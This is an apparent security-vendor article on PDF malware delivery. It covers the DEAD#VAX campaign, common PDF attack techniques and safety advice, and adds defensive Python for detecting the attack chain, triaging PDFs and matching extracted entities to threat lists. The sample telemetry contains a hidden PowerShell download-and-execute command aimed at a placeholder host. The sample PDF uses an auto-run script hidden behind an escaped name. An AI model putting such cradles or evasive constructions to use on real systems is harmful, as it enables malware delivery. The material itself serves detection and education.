Why PDFs Are the Top Malware Delivery Format
PDFs are the most common file format used to deliver malware, according to Palo Alto Networks Unit 42 research. Attackers prefer PDFs because they are universally trusted, expected in business contexts, and capable of embedding executable content, links, and scripts that most recipients will not question.
ScamVerify™ tracks 74,032 malicious domains through URLhaus and 60,758 indicators of compromise through ThreatFox. A growing share of these threat indicators are connected to campaigns that begin with a malicious PDF delivered by email.
The DEAD#VAX Campaign: A Case Study
One of the most sophisticated PDF malware campaigns in recent years is DEAD#VAX, identified by security researchers at Securonix. This campaign demonstrates how far attackers have evolved beyond simple malicious attachments.
How DEAD#VAX Works
- The victim receives an email with an attached PDF that appears to be an invoice, shipping notification, or business document
- The PDF contains a link rather than embedded malware, bypassing many email security scanners
- Clicking the link downloads a virtual hard disk (VHD) file disguised as a PDF, using a double extension (e.g., "Invoice_March.pdf.vhd")
- Windows automatically mounts the VHD as a virtual drive when opened
- The mounted drive contains a shortcut file that executes a PowerShell script
- The script downloads and installs AsyncRAT, a remote access trojan that gives the attacker full control of the victim's computer
AsyncRAT allows attackers to:
- Record keystrokes to capture passwords and sensitive data
- Access files on the infected computer and connected network drives
- Control the webcam and microphone for surveillance
- Deploy additional malware including ransomware
- Exfiltrate data silently over extended periods
Why This Technique Evades Detection
| Defense | Why It Fails Against DEAD#VAX |
|---|---|
| Email attachment scanning | PDF itself contains no malware, only a link |
| URL filtering | Download link may be hosted on compromised legitimate site |
| File type blocking | VHD files are legitimate Windows disk images |
| Antivirus scanning | Payload is encrypted and downloaded in stages |
| User awareness | File appears to be a normal PDF invoice |
The multi-stage delivery chain means no single security tool sees the complete attack. Each stage appears benign in isolation.
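Because each stage looks benign to the tool that sees it, the practical answer is a detection that spans stages. The block below is an added example, not code from the page, from Securonix, or from any product. Its event schema (`type`, `image`, `drive`, `cwd`, `parent_image`, `cmdline`) is an assumption made for the illustration rather than a real EDR or Sysmon format, and the events are constructed.

```python
"""Correlate the stages of a link -> disk image -> shortcut -> PowerShell chain.

Added example, not code from the page or from Securonix. The event schema
(type, image, drive, cwd, parent_image, cmdline) is an assumption made for
the illustration, not a real EDR or Sysmon format, and the events below are
constructed. The logic follows the text's point: each stage is benign in
isolation, so the signal is in the sequence.
"""
from dataclasses import dataclass, field
import re

DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx"}
CONTAINER_EXTS = {"vhd", "vhdx", "iso", "img"}
SHELL_BINARIES = {"powershell.exe", "pwsh.exe"}
# Command-line fragments that fetch remote content (illustrative, not exhaustive).
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def is_disguised_container(filename: str) -> bool:
    """True for names like Invoice_March.pdf.vhd: a document extension placed
    in front of a mountable container extension."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    _, inner, outer = parts
    return inner in DOCUMENT_EXTS and outer in CONTAINER_EXTS


@dataclass
class Alert:
    drive: str
    image: str
    score: int = 0
    stages: list = field(default_factory=list)

    def add(self, points: int, reason: str) -> None:
        self.score += points
        self.stages.append(reason)


def correlate(events, threshold: int = 6):
    """One pass over time-ordered events. Raises an alert for each PowerShell
    launch that can be tied to a currently mounted disk image, scored by how
    many stages of the chain are present."""
    mounted = {}  # drive letter -> path of the mounted image file
    alerts = []
    for ev in events:
        kind = ev["type"]
        if kind == "image_mounted":
            mounted[ev["drive"].upper()] = ev["image"]
        elif kind == "image_unmounted":
            mounted.pop(ev["drive"].upper(), None)
        elif kind == "process_created" and basename(ev["image"]).lower() in SHELL_BINARIES:
            cwd = ev.get("cwd", "").upper()
            cmd = ev.get("cmdline", "")
            for drive, image in mounted.items():
                if not (cwd.startswith(drive) or drive in cmd.upper()):
                    continue
                a = Alert(drive=drive, image=image)
                a.add(3, f"PowerShell started from mounted image on {drive}")
                if is_disguised_container(basename(image)):
                    a.add(3, "mounted image has a document double extension")
                if basename(ev.get("parent_image", "")).lower() == "explorer.exe":
                    a.add(1, "parent is explorer.exe, consistent with a clicked shortcut")
                if DOWNLOAD_RE.search(cmd):
                    a.add(2, "command line fetches remote content")
                if a.score >= threshold:
                    alerts.append(a)
    return alerts


# Constructed sample telemetry (not from a real incident).
CHAIN_EVENTS = [
    {"ts": 1, "type": "image_mounted", "drive": "E:",
     "image": "C:\\Users\\jo\\Downloads\\Invoice_March.pdf.vhd"},
    {"ts": 2, "type": "process_created",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cwd": "E:\\",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://stage2.example.invalid/p')\""},
]
# An administrator mounting a build image and running an unrelated script.
BENIGN_EVENTS = [
    {"ts": 1, "type": "image_mounted", "drive": "F:", "image": "D:\\images\\build.vhdx"},
    {"ts": 2, "type": "process_created",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cwd": "C:\\Users\\admin",
     "cmdline": "powershell.exe -File C:\\Users\\admin\\report.ps1"},
]

if __name__ == "__main__":
    for a in correlate(CHAIN_EVENTS):
        print(f"score {a.score}: {a.image}")
        for s in a.stages:
            print("  -", s)
```

The scoring is deliberately additive: a mount alone or a PowerShell launch alone never crosses the threshold, while the combination that the chain requires (shell started from a freshly mounted image, launched via Explorer, reaching out for a second stage) does. In a real deployment the mount and process-creation records would come from endpoint telemetry, and the threshold is the knob an analyst tunes against local false positives.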
Common PDF Malware Techniques in 2026
Embedded JavaScript
PDFs support embedded JavaScript that executes when the file is opened. While modern PDF readers disable JavaScript by default, many enterprise environments re-enable it for legitimate PDF functionality. Malicious JavaScript can:
- Redirect to phishing websites
- Download and execute files
- Exploit vulnerabilities in the PDF reader
Phishing Links Disguised as Buttons
The simplest and most common technique: a PDF with a professional design that includes a "View Invoice," "Download Statement," or "Verify Account" button. The button links to a malicious URL that either delivers malware or leads to a credential harvesting page.
Form-Based Data Collection
PDFs support interactive forms. Attackers create documents with fillable fields that submit data to attacker-controlled servers. The victim fills out what appears to be a legitimate form (tax document, application, verification) and sends their personal information directly to the attacker.
Encrypted PDFs With Password Bait
Attackers send a PDF protected with a password, then provide the password in the email body. This technique bypasses security scanners (which cannot open password-protected files) and makes the document feel more confidential and legitimate.
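Every technique in this section leaves a footprint in the PDF's own object dictionaries: `/JavaScript` and `/JS` for scripts, `/OpenAction` for code that runs on open, `/URI` for button links, `/SubmitForm` for forms that post data, `/Encrypt` for password-protected files. That is what static triage keys on. The block below is an added example, not code from the page, from ScamVerify, or from any PDF reader; the sample PDF is constructed inside it and is structurally minimal (no xref table), built for scanning rather than for opening in a viewer.

```python
"""Static triage of the dictionary keys that give a PDF active behaviour.

Added example; not code from the page, from ScamVerify or from any PDF
reader. It scans raw bytes after undoing two cheap evasions (hex-escaped
names such as /Java#53cript, and objects tucked inside FlateDecode-compressed
object streams) and never renders or executes anything. The sample file is
constructed below and is structurally minimal (no xref table), built for
scanning rather than for opening in a viewer.
"""
import re
import zlib

# Keys that make a document do something rather than merely display something.
RISK_KEYS = {
    "/JavaScript": "JavaScript action",
    "/JS": "inline JavaScript code",
    "/OpenAction": "action fires automatically when the file is opened",
    "/AA": "additional actions (page or field event triggers)",
    "/Launch": "launches an external program or file",
    "/EmbeddedFile": "carries an embedded file",
    "/SubmitForm": "form data is posted to a URL",
    "/RichMedia": "rich media content",
    "/Encrypt": "encrypted; content is opaque to naive scanners",
}
HEX_NAME_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
REF_RE = re.compile(rb"/(?:URI|F)\s*\(([^)]*)\)")  # link targets and file specs


def normalise_names(data: bytes) -> bytes:
    """Decode '#xx' escapes so that /Java#53cript reads /JavaScript."""
    return HEX_NAME_RE.sub(lambda m: bytes.fromhex(m.group(1).decode()), data)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated content of every Flate stream so keys hidden inside
    compressed objects (including object streams) get scanned as well.
    decompressobj tolerates a stream cut short at the regex boundary."""
    extra = []
    for m in STREAM_RE.finditer(data):
        try:
            extra.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            continue  # image data or another filter; not our concern here
    return data + b"\n" + b"\n".join(extra)


def triage(pdf: bytes) -> dict:
    """Return {'flags': {key: (count, meaning)}, 'urls': [...], 'score': int}."""
    data = normalise_names(inflate_streams(pdf))
    flags = {}
    for key, meaning in RISK_KEYS.items():
        # The name must end at a delimiter so /JS does not match a longer name.
        n = len(re.findall(re.escape(key.encode()) + rb"(?![A-Za-z])", data))
        if n:
            flags[key] = (n, meaning)
    refs = sorted({r.decode("latin-1") for r in REF_RE.findall(data)})
    score = sum(n for n, _ in flags.values()) + len(refs)
    return {"flags": flags, "urls": refs, "score": score}


def build_sample() -> bytes:
    """Constructed sample, not a real malicious file: the JavaScript action
    lives in a compressed object stream under a hex-escaped name, a link
    annotation plays the 'View Invoice' button, and a form button submits to
    a placeholder URL. All hosts use the reserved .invalid TLD."""
    inner = b"6 0 << /S /Java#53cript /JS (app.alert('hello')) >>"
    objstm = zlib.compress(inner)
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R "
        b"/AcroForm << /Fields [7 0 R] >> >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n",
        b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 7 0 R] >> endobj\n",
        b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 20] "
        b"/A << /S /URI /URI (http://verify.example.invalid/invoice) >> >> endobj\n",
        b"5 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length %d >>\n"
        % len(objstm),
        b"stream\n", objstm, b"\nendstream\nendobj\n",
        b"7 0 obj << /Type /Annot /Subtype /Widget /FT /Btn /T (send) "
        b"/A << /S /SubmitForm /F (http://collect.example.invalid/post) >> >> endobj\n",
        b"trailer << /Root 1 0 R >>\n%EOF\n",
    ])


if __name__ == "__main__":
    report = triage(build_sample())
    for key, (n, meaning) in report["flags"].items():
        print(f"{key:14} x{n}  {meaning}")
    print("references:", *report["urls"])
    print("score:", report["score"])
```

Two design points. First, scanning raw bytes is only as good as the decoding in front of it: without the name normalisation and stream inflation the sample's `/JavaScript` would never be seen, which is exactly why production tools parse the object graph properly (other filters, cross-referenced object streams, incremental updates) rather than grepping. Second, the `/Encrypt` flag is the scanner's honest answer to the password-bait technique above: it cannot look inside, but it can say so and route the file for manual review instead of passing it as clean.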
File Types That Disguise Malware as Documents
PDFs are not the only document format weaponized by attackers:
| File Type | Risk Level | Common Disguise |
|---|---|---|
| .pdf | High | Invoices, receipts, contracts, shipping notices |
| .docx (with macros) | High | Business proposals, HR documents, legal forms |
| .xlsx (with macros) | High | Financial reports, purchase orders, data exports |
| .html (as attachment) | Medium | "View in browser" redirects to phishing |
| .vhd/.iso | Medium | Mounted disk images containing executables |
| .zip/.rar | Medium | Compressed archives hiding executables |
How to Stay Safe From PDF Malware
1. Do Not Open Unexpected Attachments
If you receive a PDF you were not expecting, verify its legitimacy before opening. Contact the sender through a separate channel (phone call, separate email) to confirm they sent the document.
2. Disable JavaScript in Your PDF Reader
In Adobe Acrobat: Edit > Preferences > JavaScript > uncheck "Enable Acrobat JavaScript." In most cases, legitimate PDFs do not require JavaScript to function.
3. Use Preview Mode
Open PDFs in your operating system's built-in preview tool (Preview on macOS, Microsoft Edge PDF viewer on Windows) rather than full-featured PDF editors. Preview tools execute less embedded content and provide a safer viewing environment.
4. Watch for Double Extensions
Files with names like "Invoice.pdf.vhd" or "Contract.pdf.exe" are disguised executables. Windows hides known file extensions by default, so "Invoice.pdf.vhd" may appear as just "Invoice.pdf." Enable "Show file extensions" in your file manager settings.
5. Upload Suspicious Documents to ScamVerify
The ScamVerify document checker analyzes uploaded PDFs and images using AI. The analysis extracts all text content, identifies embedded phone numbers, email addresses, and URLs, then checks each entity against 8 million+ threat records. This catches documents that reference known malicious infrastructure even when the PDF itself does not contain malware.
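Entity extraction followed by a threat-intelligence lookup, as described above, reduces to a small pipeline: pull URLs, e-mail addresses and phone numbers out of the extracted text, normalise them, and match each against the records. The block below is an added illustration and not ScamVerify's code: its record sources, matching rules and scale are not on the page, so the denylist, the document text and the matching logic here are constructed assumptions, and text extraction itself (PDF parsing or OCR) is left out.

```python
"""Entity extraction plus threat-list lookup over a document's text.

Added illustration, not ScamVerify's code: the page gives the approach
(extract text entities, check them against threat records) but not the
record sources or matching rules, so the denylist, the sample text and the
matching logic here are constructed assumptions. Text extraction itself
(PDF/OCR) is out of scope; the functions take already-extracted text.
"""
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"\bhttps?://[^\s<>()\"']+", re.IGNORECASE)
EMAIL_RE = re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b")
PHONE_RE = re.compile(r"\+?\d[\d\s().-]{7,}\d")


def extract_entities(text: str) -> dict:
    """Pull URLs, e-mail addresses and phone numbers out of free text.
    Phone numbers are reduced to digits so formatting differences do not
    defeat the lookup."""
    phones = {re.sub(r"\D", "", p) for p in PHONE_RE.findall(text)}
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "emails": sorted(e.lower() for e in set(EMAIL_RE.findall(text))),
        "phones": sorted(phones),
    }


def domain_candidates(host: str) -> list:
    """The host and each parent domain above it, stopping before the TLD, so a
    listed domain also catches its subdomains. Simplification: no public
    suffix list, so 'co.uk'-style suffixes are treated as ordinary labels."""
    labels = host.lower().strip(".").split(".")
    return [".".join(labels[i:]) for i in range(len(labels) - 1)]


def check_entities(entities: dict, intel: dict) -> list:
    """Match extracted entities against a threat list shaped like
    {'domains': set, 'emails': set, 'phones': set}. Returns one finding per
    match, naming the record that matched."""
    findings = []
    for url in entities["urls"]:
        host = urlsplit(url).hostname or ""
        for cand in domain_candidates(host):
            if cand in intel["domains"]:
                findings.append({"kind": "url", "value": url, "matched": cand})
                break
    for email in entities["emails"]:
        if email in intel["emails"]:
            findings.append({"kind": "email", "value": email, "matched": email})
            continue
        for cand in domain_candidates(email.split("@", 1)[1]):
            if cand in intel["domains"]:
                findings.append({"kind": "email", "value": email, "matched": cand})
                break
    for phone in entities["phones"]:
        if phone in intel["phones"]:
            findings.append({"kind": "phone", "value": phone, "matched": phone})
    return findings


def analyse(text: str, intel: dict) -> list:
    return check_entities(extract_entities(text), intel)


# Constructed threat list and document text (placeholders, not real IoCs).
INTEL = {
    "domains": {"pay-invoice.example"},
    "emails": set(),
    "phones": {"15550109933"},
}
DOC_TEXT = """ACME Supplies Ltd - Invoice INV-20931
Amount due: $4,820.00
To view and pay this invoice, visit https://cdn.pay-invoice.example/view?id=20931
Questions? Email billing@acme-supplies.example or call +1 (555) 010-9933.
Registered office: 12 Harbour Road."""

if __name__ == "__main__":
    for f in analyse(DOC_TEXT, INTEL):
        print(f"{f['kind']:6} {f['value']}  -> matched {f['matched']}")
```

The sample document contains no active content at all, which is the case the page is making: a "clean" PDF whose link points at a subdomain of a listed domain and whose callback number is a listed one still gets flagged, because the match is on the infrastructure the document references rather than on the file's bytes. Matching parent domains is what makes the subdomain hit possible; a production version would use a public suffix list so that it never walks up into a shared suffix.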
The Business Impact
PDF malware campaigns frequently target businesses because:
- Employees expect to receive PDFs (invoices, contracts, reports) as part of normal operations
- Business PDFs often require opening attachments rather than viewing in a browser
- A single infected workstation can provide access to the entire corporate network
- Business accounts and data are more valuable than individual consumer data
The FBI's Internet Crime Complaint Center reports billions in annual losses from attacks that begin with malicious document delivery, making document security a critical business concern.
FAQ
Can opening a PDF infect my computer?
On a fully updated system with modern PDF reader defaults, simply viewing a PDF is very low risk. The danger comes from clicking links within the PDF, enabling JavaScript execution, opening embedded files, or downloading additional files prompted by the PDF. Keep your software updated and avoid interacting with unexpected content within PDFs.
Is it safe to open PDFs in a web browser?
Generally safer than opening in a full PDF editor. Modern browsers (Chrome, Edge, Firefox) render PDFs in a sandboxed environment that limits the impact of any malicious content. However, phishing links within the PDF still work, so verify before clicking any link.
How does ScamVerify's document analysis work differently from antivirus?
Antivirus scans for known malware signatures within the file. ScamVerify's document analysis takes a different approach: it extracts the human-readable content (text, phone numbers, URLs, email addresses) and checks those entities against threat intelligence databases. This catches documents that are part of fraud schemes even when the PDF itself is technically clean.
What should I do if I already opened a suspicious PDF?
If you only viewed the PDF without clicking links or enabling macros, the risk is low on an updated system. If you clicked a link or downloaded additional files, disconnect from the internet, run a full antivirus scan, and change passwords for any accounts you accessed from that computer. Report the incident to your IT department if applicable.